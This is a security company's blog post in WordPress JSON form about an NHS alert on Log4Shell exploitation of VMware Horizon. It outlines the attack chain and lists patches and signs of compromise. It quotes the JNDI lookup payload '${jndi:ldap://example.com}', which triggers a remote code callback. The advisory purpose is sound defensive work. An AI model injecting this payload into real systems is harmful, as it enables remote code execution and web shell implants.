{"id":4235,"date":"2022-01-12T15:05:44","date_gmt":"2022-01-12T09:35:44","guid":{"rendered":"https:\/\/xiarch.com\/blog\/?p=4235"},"modified":"2022-01-12T15:05:46","modified_gmt":"2022-01-12T09:35:46","slug":"nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon","status":"publish","type":"post","link":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/","title":{"rendered":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon"},"content":{"rendered":"\n

National Health Service (NHS) of the UK has posted a cyber alert warning of an unknown threat gang targeting VMware Horizon setups with Log4Shell exploits. Log4Shell is an exploit for CVE-2021-44228, a sensitive arbitrary remote code execution flaw in the Apache Log4j.2.14, which has been under active and high-volume exploitation in December 2021.<\/p><\/p>\n\n\n\n

Apache addressed the above and four more vulnerabilities through consecutive security updates and, Log4j version 2.17.1 is now considered adequately protected.<\/p><\/p>\n\n\n\n

Addressing Apache Tomcat in VMware Perspective<\/strong><\/h2>\n\n\n\n

According to the NHS notice, the threat actor is leveraging the exploit to achieve the remote code execution on vulnerable VMware Horizon deployments on public frameworks. \u201cThe attack usually consists of a exploration phase, where the threat actor utilizes the Java Naming and Directory InterfaceTM (JNDI) through Log4Shell payloads to call back to malicious framework.\u201d<\/p><\/p>\n\n\n\n

\u201cIn a deficiency has been affected, the attack them utilizes the Lightweight Directory Access Protocol (LDAP) to fetch and run a malicious Java class file that inserts a web shell into the VM Blast Secure Gateway service.\u201d \u201cThe web shell can then be utilized by the attacker to carry out a various malicious activities such as deploying the additional malicious software, data exfiltration, or the deployment of ransomware.\u201d<\/p><\/p>\n\n\n\n

The actor is taking the advantage of the existence of the Apache Tomcat service embedded within <\/p><\/p>\n\n\n\n

VMware Horizon, which is vulnerable to Log4Shell. The exploitation begins with the simple and widely utilized “${jndi:ldap:\/\/example.com}” payload and spawns the following PowerShell command from Tomcat.<\/p><\/p>\n\n\n\n

\"NHS-Alerts-the-threat-actors-Exploiting-Log4Shell-in-VMware-Horizon-image1\"<\/figure><\/div>\n\n\n\n

This command appeal to a win32 service to get a list of \u2018VMBlastSG\u2019 service names, retrieve path, modify \u2018absg-worker.js\u2019 to drop a listener, and then restart the service to activate the implant. The listener was then responsible for executing arbitrary commands received through HTTP\/HTTPS as the header objects with a hardcoded string.<\/p><\/p>\n\n\n\n

At this point, the attacker has established persistent and stable communication with the C2 server and can execute information exhilaration, command execution, and deployment of the ransomware.  <\/p><\/p>\n\n\n\n

\"NHS-Alerts-the-threat-actors-Exploiting-Log4Shell-in-VMware-Horizon-image2\"<\/figure><\/div>\n\n\n\n

VMware Horizon is not the only VMware product targeted by threat actors using the Log4j vulnerability. The Conti ransomware operation is also using Log4Shell to spread laterally to vulnerable VMware vCenter servers to more easily encrypt virtual machines.<\/p><\/p>\n\n\n\n

What are the Security Updates Available?<\/strong><\/h2>\n\n\n\n

VMware released a security update for Horizon and other products last month, fixing CVE-2021-44228 and CVE-2021-45046 with versions 2111, 7.13.1, and 7.10.3<\/p><\/p>\n\n\n\n

As such, all VMware Horizon admins are urged to apply the security updates as soon as possible. NHS’s report also highlights the following three signs of active exploitation on vulnerable systems:<\/p><\/p>\n\n\n\n

  • Evidence of ws_TomcatService.exe spawning abnormal processes<\/li>
  • Any powershell.exe processes containing ‘VMBlastSG’ in the command line<\/li>
  • File modifications to ‘\u2026\\VMware\\VMware View\\Server\\appblastgateway\\lib\\absg-worker.js’ – This file are generally overwritten during upgrades and not modified<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"

    National Health Service (NHS) of the UK has posted a cyber alert warning of an unknown threat gang targeting VMware Horizon setups with Log4Shell exploits. Log4Shell is an exploit for CVE-2021-44228, a sensitive arbitrary remote code execution flaw in the Apache Log4j.2.14, which has been under active and high-volume exploitation in December 2021. Apache addressed […]<\/p>\n","protected":false},"author":2,"featured_media":4239,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6],"tags":[],"yoast_head":"\nNHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited\" \/>\n<meta property=\"og:description\" content=\"National Health Service (NHS) of the UK has posted a cyber alert warning of an unknown threat gang targeting VMware Horizon setups with Log4Shell exploits. Log4Shell is an exploit for CVE-2021-44228, a sensitive arbitrary remote code execution flaw in the Apache Log4j.2.14, which has been under active and high-volume exploitation in December 2021. Apache addressed […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\" \/>\n<meta property=\"og:site_name\" content=\"Xiarch Solutions Private Limited\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xiarch\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-12T09:35:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-01-12T09:35:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2022\/01\/NHS-Alerts-the-threat-actors-Exploiting-Log4Shell-in-VMware-Horizon-featured-image.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"525\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Xiarch Security\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@xiarch\" \/>\n<meta name=\"twitter:site\" content=\"@xiarch\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Xiarch Security\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\"},\"author\":{\"name\":\"Xiarch Security\",\"@id\":\"https:\/\/xiarch.com\/blog\/#\/schema\/person\/655d814a04eacce56942270cfdc5c59c\"},\"headline\":\"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon\",\"datePublished\":\"2022-01-12T09:35:44+00:00\",\"dateModified\":\"2022-01-12T09:35:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\"},\"wordCount\":487,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/xiarch.com\/blog\/#organization\"},\"articleSection\":[\"Vulnerabilities\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\",\"url\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\",\"name\":\"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited\",\"isPartOf\":{\"@id\":\"https:\/\/xiarch.com\/blog\/#website\"},\"datePublished\":\"2022-01-12T09:35:44+00:00\",\"dateModified\":\"2022-01-12T09:35:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/xiarch.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/xiarch.com\/blog\/#website\",\"url\":\"https:\/\/xiarch.com\/blog\/\",\"name\":\"Xiarch Solutions Private Limited\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/xiarch.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/xiarch.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/xiarch.com\/blog\/#organization\",\"name\":\"Xiarch\",\"url\":\"https:\/\/xiarch.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/xiarch.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2021\/06\/xi-logo-002.png\",\"contentUrl\":\"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2021\/06\/xi-logo-002.png\",\"width\":300,\"height\":300,\"caption\":\"Xiarch\"},\"image\":{\"@id\":\"https:\/\/xiarch.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/xiarch\/\",\"https:\/\/twitter.com\/xiarch\",\"https:\/\/www.linkedin.com\/company\/xiarch\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/xiarch.com\/blog\/#\/schema\/person\/655d814a04eacce56942270cfdc5c59c\",\"name\":\"Xiarch Security\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/xiarch.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d33699ed91b76568586dc1ae278ea568?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d33699ed91b76568586dc1ae278ea568?s=96&d=mm&r=g\",\"caption\":\"Xiarch Security\"},\"sameAs\":[\"https:\/\/xiarch.com\/blog\/\"],\"url\":\"https:\/\/xiarch.com\/blog\/author\/vector\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/","og_locale":"en_US","og_type":"article","og_title":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited","og_description":"National Health Service (NHS) of the UK has posted a cyber alert warning of an unknown threat gang targeting VMware Horizon setups with Log4Shell exploits. Log4Shell is an exploit for CVE-2021-44228, a sensitive arbitrary remote code execution flaw in the Apache Log4j.2.14, which has been under active and high-volume exploitation in December 2021. Apache addressed […]","og_url":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/","og_site_name":"Xiarch Solutions Private Limited","article_publisher":"https:\/\/www.facebook.com\/xiarch\/","article_published_time":"2022-01-12T09:35:44+00:00","article_modified_time":"2022-01-12T09:35:46+00:00","og_image":[{"width":1000,"height":525,"url":"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2022\/01\/NHS-Alerts-the-threat-actors-Exploiting-Log4Shell-in-VMware-Horizon-featured-image.jpg","type":"image\/jpeg"}],"author":"Xiarch Security","twitter_card":"summary_large_image","twitter_creator":"@xiarch","twitter_site":"@xiarch","twitter_misc":{"Written by":"Xiarch Security","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#article","isPartOf":{"@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/"},"author":{"name":"Xiarch Security","@id":"https:\/\/xiarch.com\/blog\/#\/schema\/person\/655d814a04eacce56942270cfdc5c59c"},"headline":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon","datePublished":"2022-01-12T09:35:44+00:00","dateModified":"2022-01-12T09:35:46+00:00","mainEntityOfPage":{"@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/"},"wordCount":487,"commentCount":0,"publisher":{"@id":"https:\/\/xiarch.com\/blog\/#organization"},"articleSection":["Vulnerabilities"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/","url":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/","name":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon - Xiarch Solutions Private Limited","isPartOf":{"@id":"https:\/\/xiarch.com\/blog\/#website"},"datePublished":"2022-01-12T09:35:44+00:00","dateModified":"2022-01-12T09:35:46+00:00","breadcrumb":{"@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/xiarch.com\/blog\/nhs-alerts-the-threat-actors-exploiting-log4shell-in-vmware-horizon\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/xiarch.com\/blog\/"},{"@type":"ListItem","position":2,"name":"NHS Alerts the threat actors Exploiting Log4Shell in VMware Horizon"}]},{"@type":"WebSite","@id":"https:\/\/xiarch.com\/blog\/#website","url":"https:\/\/xiarch.com\/blog\/","name":"Xiarch Solutions Private Limited","description":"","publisher":{"@id":"https:\/\/xiarch.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/xiarch.com\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/xiarch.com\/blog\/#organization","name":"Xiarch","url":"https:\/\/xiarch.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/xiarch.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2021\/06\/xi-logo-002.png","contentUrl":"https:\/\/xiarch.com\/blog\/wp-content\/uploads\/2021\/06\/xi-logo-002.png","width":300,"height":300,"caption":"Xiarch"},"image":{"@id":"https:\/\/xiarch.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/xiarch\/","https:\/\/twitter.com\/xiarch","https:\/\/www.linkedin.com\/company\/xiarch"]},{"@type":"Person","@id":"https:\/\/xiarch.com\/blog\/#\/schema\/person\/655d814a04eacce56942270cfdc5c59c","name":"Xiarch Security","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/xiarch.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d33699ed91b76568586dc1ae278ea568?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d33699ed91b76568586dc1ae278ea568?s=96&d=mm&r=g","caption":"Xiarch Security"},"sameAs":["https:\/\/xiarch.com\/blog\/"],"url":"https:\/\/xiarch.com\/blog\/author\/vector\/"}]}},"_links":{"self":[{"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/posts\/4235"}],"collection":[{"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/comments?post=4235"}],"version-history":[{"count":1,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/posts\/4235\/revisions"}],"predecessor-version":[{"id":4240,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/posts\/4235\/revisions\/4240"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/media\/4239"}],"wp:attachment":[{"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/media?parent=4235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/categories?post=4235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xiarch.com\/blog\/wp-json\/wp\/v2\/tags?post=4235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}